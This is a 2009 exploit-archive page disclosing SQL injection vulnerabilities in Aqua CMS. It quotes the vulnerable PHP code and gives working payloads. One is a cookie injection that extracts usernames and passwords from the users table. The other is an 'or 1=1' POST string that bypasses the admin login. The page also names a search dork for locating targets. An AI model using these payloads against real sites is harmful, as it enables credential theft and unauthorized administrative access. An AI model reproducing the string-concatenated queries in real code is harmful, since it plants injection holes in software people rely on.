exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Aqua CMS SQL Injection

Aqua CMS SQL Injection
Posted Apr 14, 2009
Authored by halkfild

Aqua CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 5735fa6e6c4f7e8efbdcc8c540e168a72732918a5d69da256f8a03737d796bc6

Aqua CMS SQL Injection

Change Mirror Download
================================================================================

Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Visit : crackfor.me, forum.antichat.ru, raz0r.name
Mail : bugtraq[d0g]crackfor.me
Home : http://crackfor.me - online md5 crack service

================================================================================

SQL-injections:
Need: magic quotes = off


vuln file: /droplets/functions/base.php
vuln code:

65:// Check the status of the orders

if(isset($_COOKIE["userSID"])) {
$sqltable = $sitename."_orders";
$selck = $_COOKIE["userSID"];
mysql_select_db($database, $dbconnect);
$query_cartcheck = "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";
$cartcheck = mysql_query($query_cartcheck, $dbconnect) or die(mysql_error());
$row_cartcheck = mysql_fetch_assoc($cartcheck);
$totalRows_cartcheck = mysql_num_rows($cartcheck);

if ($totalRows_cartcheck != 0) {
$user_ip_address = $_SERVER['REMOTE_ADDR'];
$dt=date("YmdHis");
$UID="$dt$user_ip_address";
setcookie("userSID", $UID, time()+36000);
}

}


PoC: COOKIE: userSID='[foo]

users passwords: select concat_ws(0x3a3a,username,password)+from+aqua.[prefix_here]_users+--+

-----------------------------------------------------------------------------------


Auth bypass
Need: magic quotes = off

vuln file: /admin/index.php
vuln code:

10:
if (isset($_POST['username']) == TRUE) {
$uusername = $_POST['username'];
$upassword = $_POST['password'];
$sqltable = $sitename."_users";
mysql_select_db($database, $dbconnect);
$query_getuser = "
SELECT *
FROM $sqltable
WHERE username = '$uusername'
AND password = '$upassword'
AND groups != ''
";
$getuser = mysql_query($query_getuser, $dbconnect) or die("Unable to select database");
$row_getuser = mysql_fetch_assoc($getuser);
$totalRows_getuser = mysql_num_rows($getuser);

if ($totalRows_getuser == 1) {
$uid = $row_getuser['id'];
$uun = $row_getuser['username'];
$ugr = $row_getuser['groups'];
$setwsuser = $uid.":".$uun.":".$ugr;
//setcookie("wsuser", $setwsuser, time()+36000, '/');
//header("Location: index.php");
}

// User logon: end
}


PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close